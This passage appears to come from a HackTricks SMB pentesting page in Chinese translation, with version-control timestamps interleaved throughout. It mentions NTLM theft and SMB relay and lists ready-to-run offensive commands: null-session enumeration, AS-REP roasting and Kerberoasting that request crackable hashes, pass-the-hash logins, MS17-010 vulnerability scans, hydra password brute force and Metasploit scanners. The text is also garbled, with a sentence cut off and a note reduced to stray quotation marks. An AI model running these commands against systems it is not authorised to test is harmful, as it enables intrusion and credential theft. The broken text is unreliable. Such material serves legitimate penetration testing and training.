2024-07-19 11:24:45 +00:00
.png>)
2022-09-15 17:28:33 +00:00
2024-07-19 11:24:45 +00:00
## NTLM Theft
2022-09-15 17:28:33 +00:00
2024-07-19 11:24:45 +00:00
与 SMB 捕获类似,将恶意文件植入目标系统(例如通过 SMB) SMB relay attack ](pentesting-smb.md#smb-relay-attack ) 中使用。
2023-08-27 20:13:14 +00:00
2024-07-19 11:24:45 +00:00
[查看: ntlm\_theft ](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft )
2021-08-12 13:30:40 +00:00
2024-07-19 11:24:45 +00:00
## HackTricks Automatic Commands
2021-10-18 11:21:18 +00:00
```
2023-12-26 21:49:09 +00:00
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
2021-08-12 13:30:40 +00:00
2023-12-26 21:49:09 +00:00
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘ ’ ‘ ’ ‘ ’
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
#These are the commands I run in order every time I see an open SMB port
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
With No Creds
2023-08-03 19:12:22 +00:00
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
2023-12-26 21:49:09 +00:00
With Creds
2023-08-03 19:12:22 +00:00
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.xyz/pentesting/pentesting-smb
2021-08-15 18:12:30 +00:00
2023-12-26 21:49:09 +00:00
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
2021-08-15 18:12:30 +00:00
2023-12-26 21:49:09 +00:00
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
2021-09-25 16:33:43 +00:00
2023-12-26 21:49:09 +00:00
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
2023-08-03 19:12:22 +00:00
2023-12-26 21:49:09 +00:00
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
2022-04-28 16:01:33 +00:00
2023-12-26 21:49:09 +00:00
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' & & msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
2023-08-27 20:13:14 +00:00
2023-12-26 21:49:09 +00:00
```
2024-07-19 11:24:45 +00:00
{% hint style="success" %}
学习与实践 AWS 黑客技术:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
学习与实践 GCP 黑客技术:< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks 培训 GCP 红队专家 (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
< details >
2024-01-02 22:21:01 +00:00
2024-07-19 11:24:45 +00:00
< summary > 支持 HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 11:24:45 +00:00
* 查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram 群组** ](https://t.me/peass ) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) GitHub 仓库提交 PR 来分享黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:24:45 +00:00
{% endhint %}
